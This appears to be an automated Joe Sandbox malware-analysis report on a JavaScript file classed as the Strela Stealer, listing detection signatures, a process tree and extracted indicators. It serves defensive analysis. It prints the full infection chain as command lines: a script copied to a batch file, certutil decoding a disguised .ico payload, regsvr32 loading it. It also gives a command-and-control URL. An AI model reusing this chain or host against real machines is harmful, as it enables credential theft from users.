Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.js

Overview

General Information

Sample name:file.js
Analysis ID:1417160
MD5:2ecfb5962169fd0cd5481a5bdfa56bba
SHA1:9e97ed9944bc0442554b423009f1b4950811a4fc
SHA256:b50491831cb3674fcdb34933ad61d233ac2cc275ac396d00f7257f9bc0328a97
Tags:js
Infos:

Detection

Strela Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Yara detected Strela Stealer
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected EXE embedded in BAT file
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 6736 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6908 cmdline: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 7080 cmdline: wmic path win32_operatingsystem get oslanguage MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • find.exe (PID: 7084 cmdline: find /i "1033" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • findstr.exe (PID: 7156 cmdline: findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat"" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • certutil.exe (PID: 6180 cmdline: certutil -f -decode deepdidacticfour childlikeclearintroduce.ico MD5: F17616EC0522FC5633151F7CAA278CAA)
      • powershell.exe (PID: 5500 cmdline: powershell regsvr32 childlikeclearintroduce.ico MD5: 04029E121A0CFA5991749937DD22A1D9)
        • regsvr32.exe (PID: 5460 cmdline: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup
{"C2 url": "45.9.74.12/server.php"}
SourceRuleDescriptionAuthorStrings
file.jsJoeSecurity_EXEembeddedinBATfileYara detected EXE embedded in BAT fileJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\stiffrelievedawesome.batJoeSecurity_EXEembeddedinBATfileYara detected EXE embedded in BAT fileJoe Security
      SourceRuleDescriptionAuthorStrings
      00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
        00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
          Process Memory Space: regsvr32.exe PID: 5460JoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            8.2.regsvr32.exe.7ffe1023e734.1.unpackJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
              8.2.regsvr32.exe.7ffe1023e734.1.raw.unpackJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
                8.2.regsvr32.exe.7ffe10230000.0.unpackJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, ProcessId: 5460, ProcessName: regsvr32.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", ProcessId: 6736, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico, ProcessId: 5460, ProcessName: regsvr32.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", CommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6736, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", ProcessId: 6908, ProcessName: cmd.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js", ProcessId: 6736, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell regsvr32 childlikeclearintroduce.ico, CommandLine: powershell regsvr32 childlikeclearintroduce.ico, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6908, ParentProcessName: cmd.exe, ProcessCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ProcessId: 5500, ProcessName: powershell.exe

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: powershell regsvr32 childlikeclearintroduce.ico, CommandLine: powershell regsvr32 childlikeclearintroduce.ico, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6908, ParentProcessName: cmd.exe, ProcessCommandLine: powershell regsvr32 childlikeclearintroduce.ico, ProcessId: 5500, ProcessName: powershell.exe
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 45.9.74.12/server.phpAvira URL Cloud: Label: malware
                  Source: 8.2.regsvr32.exe.7ffe10230000.0.unpackMalware Configuration Extractor: Strela Stealer {"C2 url": "45.9.74.12/server.php"}
                  Source: file.jsReversingLabs: Detection: 21%

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: 45.9.74.12/server.php

                  System Summary

                  barindex
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B8EE888_2_02B8EE88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B812408_2_02B81240
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B817408_2_02B81740
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B86C5C8_2_02B86C5C
                  Source: file.jsInitial sample: Strings found which are bigger than 50
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: Number of sections : 19 > 10
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: classification engineClassification label: mal100.troj.expl.evad.winJS@16/7@0/0
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\stiffrelievedawesome.batJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gw4xkmxd.b3h.ps1Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.jsReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "1033"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode deepdidacticfour childlikeclearintroduce.ico
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguageJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "1033" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat"" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode deepdidacticfour childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.icoJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cmd /k copy "C:\Users\user\Desktop\file.js" "%userprofile%\\stiffrelieved", "0", "false")
                  Source: Yara matchFile source: file.js, type: SAMPLE
                  Source: Yara matchFile source: C:\Users\user\stiffrelievedawesome.bat, type: DROPPED
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_00007FFE102314B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,8_2_00007FFE102314B0
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /4
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: .xdata
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /14
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /29
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /41
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /55
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /67
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /80
                  Source: childlikeclearintroduce.ico.6.drStatic PE information: section name: /91
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B8C5EF push esp; ret 8_2_02B8C5F5
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B8C5CC push cs; ret 8_2_02B8C5CD
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B9753E push ecx; retf 003Fh8_2_02B9759E
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02B8B542 push esp; ret 8_2_02B8B545
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\childlikeclearintroduce.icoJump to dropped file
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\childlikeclearintroduce.icoJump to dropped file
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\childlikeclearintroduce.icoJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\childlikeclearintroduce.icoJump to dropped file
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
